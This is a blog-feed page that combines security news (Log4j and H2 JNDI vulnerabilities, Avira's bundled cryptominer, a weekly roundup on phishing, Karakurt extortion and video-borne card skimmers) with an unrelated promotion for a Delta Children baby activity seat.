“use its full legal authority to pursue companies that fail to take reasonable steps to protect consumer data from exposure as a result of Log4j”.

Meanwhile, on Jan 6, 2022 CISA noted that, based on submissions to the agency’s catalog, there are at least 2800 distinct products that contain Log4j. The agency estimates that despite the determined action by many admins and security teams during December 2021, there are likely still “hundreds of millions” of individual devices still affected by the Log4j vulnerabilities.

What Comes After Log4j?

Log4j could be just the the beginning of a whole new class of bugs. It turns out that the JNDI API is very attractive as a means of compromise as it allows simple unauthenticated remote code execution. A new JNDI-based “Log4j-like” critical vulnerability was disclosed on Jan 7, 2022. Tracked as CVE-2021-42392, this related RCE flaw was discovered in H2 database consoles, an open-source relational database management system written in Java. Although far from as widespread as the Log4j vulnerability, it is estimated to affect almost 7000 assets including popular frameworks like JHipster, Play framework and Spring Boot.

Conclusion

Unfortunately for overworked admins and security teams, a new year doesn’t mean an end to old problems, and exploitation of the Log4j and related JNDI vulnerabilities is going to be haunting many defenders for some time to come. Again, we urge all to stay ahead of the Log4j situation and ensure vulnerable software is patched to the latest version of Log4j or removed where that is not possible.

If there’s any silver lining to this dark cloud it is that in order for threat actors to capitalize on vulnerabilities, they need to engage in malicious behaviour, and that’s where on-device, AI-powered endpoint protection comes into its own. Whether its cryptominers or malware loaders, ransomware or banking trojans, deploying an autonomous detection and mitigation solution is an essential part of defending the modern organization from compromise.

If you would like to see how SentinelOne can help defend your organization, contact us or request a free demo.

Resource Center | Log4j2 | Log4Shell Vulnerability
Stay Informed with Hunting Queries, Demos, and More

Learn More

Baby Racing Car Seat From Delta Children

/0 Comments/in /by

You read it right! Delta Children, the company known and loved for their eye-catching baby chairs and accessories, has created something for the little ones who were born with the speed in their veins.

Delta Children Sit N Play Portable Activity Seat for Babies is what you might call a sporty addition to the baby gear family. It is safe, comfortable, sturdy, and perfectly adjustable to any surface.

About Delta Children Portable Activity Chair

The Delta Children Sit N’ Play Portable Activity Seat will help your little one sit, interact, and play at home and on the road. The sturdy upright seat allows your baby to enjoy and interact with the world completely, while the beautiful design will look great in any room. The portable play seat is easy to fold for storage and take along, while the non-skid bottom will keep it secure on nearly any surface.

Your little one will love playing with the engaging race car-themed toys that help increase gross motor skills, and you’ll love how easy it is to clean–just remove the seat pad and pop it in the washing machine. The rest of the activity seat features water-and-stain-resistant fabric that’s easy to wipe clean!

This infant floor seat is perfect for traveling because of its innovative zippered design and convenient carry handle, which unzips to fold flat quickly.

Why choose a baby racing car seat?

Keeping your baby content in one spot is one of the most challenging tasks when it comes to caring for them. Babies love to move around and explore; they’re constantly crawling everywhere, looking for something they can pick up in their little hands, something that will bring them joy and entertainment.

This is where the Delta Children Sit N’ Play Portable Activity Seat comes in to help you. This product will have your child content on any surface, whether it’s at home or outside, on the porch, for example. You can place it anywhere, and your baby will be thrilled playing with the interactive toys that are included.

It is also vital to consider kids’ interests as soon as possible. You don’t want to wait until they’re older and have become bored with the toys you chose for them during their infantile stage. Let them play with what they enjoy, let them be kids while they still can, and once they get a bit older, things will start getting complicated because of what is expected from them in terms of behavior and maturity.

Quality kids’ chairs at your reach

Besides being a practical solution for your child’s entertainment needs, the Delta Children Sit N’ Play Portable Activity Seat is also very affordable. Now you can have a play seat for your infant that won’t break the bank as it costs just as much as other products on the market today.

Delta Children products were mentioned on ComfyBummy numerous times. You can, for example, see reviews for their amazing kids’ Frozen chairs or explore our guide to the Delta Children’s products.

You’ll never go wrong having Delta Children around. Their products are some of the most durable ones you’ll find, not only when it comes to kids’ furniture but also in terms of toys. Their quality is extremely high while their prices are fair enough that everyone can buy their products. You can find them on Amazon, where you can browse their many items and choose the one you like most.

The post Baby Racing Car Seat From Delta Children appeared first on Comfy Bummy.

500M Avira Antivirus Users Introduced to Cryptomining

/0 Comments/in /by

Many readers were surprised to learn recently that the popular Norton 360 antivirus suite now ships with a program which lets customers make money mining virtual currency. But Norton 360 isn’t alone in this dubious endeavor: Avira antivirus — which has built a base of 500 million users worldwide largely by making the product free — was recently bought by the same company that owns Norton 360 and is introducing its customers to a service called Avira Crypto.

Avira Crypto

Founded in 2006, Avira Operations GmbH & Co. KG is a German multinational software company best known for their Avira Free Security (a.k.a. Avira Free Antivirus). In January 2021, Avira was acquired by Tempe, Ariz.-based NortonLifeLock Inc., the same company that now owns Norton 360.

In 2017, the identity theft protection company LifeLock was acquired by Symantec Corp., which was renamed to NortonLifeLock in 2019. LifeLock is now included in the Norton 360 service; Avira offers users a similar service called Breach Monitor.

Like Norton 360, Avira comes with a cryptominer already installed, but customers have to opt in to using the service that powers it. Avira’s FAQ on its cryptomining service is somewhat sparse. For example, it doesn’t specify how much NortonLifeLock gets out of the deal (NortonLifeLock keeps 15 percent of any cryptocurrency mined by Norton Crypto).

“Avira Crypto allows you to use your computer’s idle time to mine the cryptocurrency Ethereum (ETH),” the FAQ explains. “Since cryptomining requires a high level of processing power, it is not suitable for users with an average computer. Even with compatible hardware, mining cryptocurrencies on your own can be less rewarding. Your best option is to join a mining pool that shares their computer power to improve their chance of mining cryptocurrency. The rewards are then distributed evenly to all members in the pool.”

NortonLifeLock hasn’t yet responded to requests for comment, so it’s unclear whether Avira uses the same cryptomining code as Norton Crypto. But there are clues that suggest that’s the case. NortonLifeLock announced Avira Crypto in late October 2021, but multiple other antivirus products have flagged Avira’s installer as malicious or unsafe for including a cryptominer as far back as Sept. 9, 2021.

Avira was detected as potentially unsafe for including a cryptominer back in Sept. 2021. Image: Virustotal.com.

The above screenshot was taken on Virustotal.com, a service owned by Google that scans submitted files against dozens of antivirus products. The detection report pictured was found by searching Virustotal for “ANvOptimusEnablementCuda,” a function included in the Norton Crypto mining component “Ncrypt.exe.”

Some longtime Norton customers took to NortonLifeLock’s online forum to express horror at the prospect of their antivirus product installing coin-mining software, regardless of whether the mining service was turned off by default.

“Norton should be DETECTING and killing off crypto mining hijacking, not installing their own,” reads a Dec. 28 thread on Norton’s forum titled “Absolutely furious.”

Others have charged that the crypto offering will end up costing customers more in electricity bills than they can ever hope to gain from letting their antivirus mine ETH. What’s more, there are hefty fees involved in moving any ETH mined by Norton or Avira Crypto to an account that the user can cash out, and many users apparently don’t understand they can’t cash out until they at least earn enough ETH to cover the fees.

In August 2021, NortonLifeLock said it had reached an agreement to acquire Avast, another longtime free antivirus product that also claims to have around 500 million users. It remains to be seen whether Avast Crypto will be the next brilliant offering from NortonLifeLock.

As mentioned in this week’s story on Norton Crypto, I get that participation in these cryptomining schemes is voluntary, but much of that ultimately hinges on how these crypto programs are pitched and whether users really understand what they’re doing when they enable them. But what bugs me most is they will be introducing hundreds of millions of perhaps less savvy Internet users to the world of cryptocurrency, which comes with its own set of unique security and privacy challenges that require users to “level up” their personal security practices in fairly significant ways.

The Good, the Bad and the Ugly in Cybersecurity – Week 1

/0 Comments/in /by

The Good

It sounds like a tagline for the latest scary film: This week…in a holding cell…THE SPINE COLLECTOR!, but this is no work of fiction. We start 2022 with a breakthrough in a real-life cyber mystery that has been puzzling and plaguing the publishing world for years. On Wednesday, news broke that the FBI had arrested a notorious and elusive cyber thief nicknamed “The Spine Collector” at JFK airport.

Filippo Bernardini, a 29 year-old employee of Simon & Schuster, was arrested and taken into custody on suspicion of wire fraud and aggravated identity theft spanning almost five years. Bernardini is believed to have masqueraded as a plethora of different editors, publishers and others in the literary profession over several years with the goal of stealing unpublished books, novels, and manuscripts, including works by bestselling authors such as Margaret Atwood and Ethan Hawke.

According to the charges filed against him, Bernardini had registered nearly 200 typosquatting domains in order to deliver spear-phishing emails to selected targets in the publishing industry. While the Spine Collector successfully stole hundreds of pieces of work, it seems he never attempted to trade or share the works he pirated, and his precise motivations still remain a mystery at this time.

The Spine Collector’s antics, which began around 2017, had become so widespread within the publishing industry that several amateur sleuths had tried to crack the case. There was widespread speculation and suspicion that the thief was an industry insider, and the whole story makes for a fascinating read itself.

That said, what can we learn from this? Nobody is immune from spear-phishing and social engineering, even when immediate financial risk may not seem to be in play. What motivates criminals and fraudsters can sometimes be factors other than money, but our defenses must be in place all the same.

The Bad

This week also saw disclosure of an attack by the Karakurt group on Tourisme Montréal (aka Visit Montreal), which represents 900 tourism industry stakeholders aiming to promote the Canadian city. The attack, which occured in December, is just one of a number in a recent uptick in Karakurt activity, all of which are primarily targeting businesses in North America.

A spokesperson for Tourisme Montréal stated that they had immediately retained security experts and that they are working to “ensure the integrity and security of our systems.” Given Karakurt’s MO, concerns remain around whether customer PII has been stolen, and the investigation is ongoing.

An image from the Karakurt leaks site

Karakurt appears to operate under a slightly atypical model. Unlike most ransomware groups, they do not attempt to encrypt victim files and instead focus entirely on exfiltration of data and subsequent extortion. Presumably, the gang has decided that there is plenty of profit to be made without the added hassle of dealing with malware (ransomware) or other tactics that would normally trip the alarms of endpoint security controls or cause service disruptions that might attract attention from the authorities.

Karakurt attacks focus heavily on the use of lolbins and COTS (Commercial Off-the-Shelf) tools. In addition, Karakurt will rely on tools like Anydesk or Cobalt Strike for delivery, staging and further lateral movement. The group is also known to purchase access or credentials for target environments (as opposed to initially breaching the target themselves).

Karakurt Extortion note

The takeaway here is that we all need to remain vigilant and keenly observant with regards to the use of non-malware TTPs in extortion attacks. While this is hardly a new message, we cannot remind ourselves too often of the lengths these criminals will go to.

The Ugly

Researchers at Palo Alto have uncovered a formjacking attack in which malicious JavaScript skimmer code is embedded in videos on a website. Other websites that embed the maliciously-crafted video will then in turn become infected with the same skimmer code. Approximately 100 real estate-focused websites appear to have been compromised using this method.

Based on the findings, the skimmer code is designed to extract email addresses, phone numbers, CC track data and other highly sensitive pieces of data. The attackers then exfiltrate any data obtained to their C2 via HTTP.

All in all a stealthy attack, but far from novel. Unfortunately, attacks don’t have to be shiny and new to work: bad guys will keep reusing whatever gets the job done.

To cap off this week, let’s not forget the ongoing Log4j2 issues (CVE-2021-44228, CVE-2021-44832). At the end of December, Log4j version 2.17.1 was released which addresses a newly discovered RCE (remote code execution) exploit. This newer vulnerability is tracked as CVE-2021-44832. We urge all to review their current posture with regards to the Log4j vulnerabilities to ensure they are as safe and protected as possible. As always, you can find the most up to date information on Log4j on our blog here.